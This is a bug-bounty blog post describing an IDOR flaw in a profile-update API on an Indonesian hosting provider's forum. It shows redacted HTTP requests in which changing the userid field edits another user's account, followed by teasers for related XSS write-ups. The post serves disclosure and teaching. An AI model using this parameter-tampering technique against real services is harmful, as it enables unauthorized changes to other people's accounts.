www.1337.or.id
Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
I want to share a story about how I made one thousand bucks from a very simple IDOR vulnerability.
I was on a forum by one of the biggest domain name registrars and web hosting in Indonesia. Then for some reason, I update my profile information. But, when I update my profile I open Chrome Devtools and analyze the HTTP request.
Request:
POST /api/v1/update/profile HTTP/2
Host: *****
[...]
{
"data" :{
"userid" : 3111,
"name" : "JJ",
"email" : "[email protected]",
[...]
}
}
Response:
{
"status" : "success",
"data" :{
"userid" : 3111,
"name" : "JJ",
"email" : "[email protected]",
[...]
}
}You can clearly see that the userid is also sent in the HTTP request. So, I registered a new account and tried to add the userid in the HTTP Request.
Request:
POST /api/v1/update/profile HTTP/2
Host: *****
[...]
{
"data" :{
"userid" : 3112,
"name" : "JJ",
"email" : "[email protected]",
[...]
}
}
Response:
{
"status" : "success",
"data" :{
"userid" : 3112,
"name" : "JJ",
"email" : "[email protected]",
[...]
}
}Gotcha! My second account which has 3112 UID was successfully updated.
Reference:
https://portswigger.net/web-security/access-control/idor
Related Posts:
Reflected XSS on sgsg.samsung.com
Ganesha
27 November 2022
25.543 Views
Like I did before, I use Google Dorks, to find some interesting URLs. Google Dork site sgsg.samsung.com I found a very interesting URL, The HTTP response shows every value from the campu...
Stored DOM-based XSS on VPSServer.com
Airlangga
10 December 2022
32.146 Views
VPSServer.com is a company that sells Virtual Private Servers VPS . A virtual private server VPS is a virtual machine sold as a service by an Internet hosting service. The virtual dedicated server VDS also has a similar meaning. Now let me share how I found a Stored DOM based XSS Vulnerab...
Ganesha
29 November 2022
26.774 Views
LaporBug.id is a Bug Bounty Platform from Indonesia, for more info about LaporBug.id you can open laporbug.id. I spent a few minutes checking every URL, parameter, and form on LaporBug.id. On this page, we have a form to upload a profile image. ...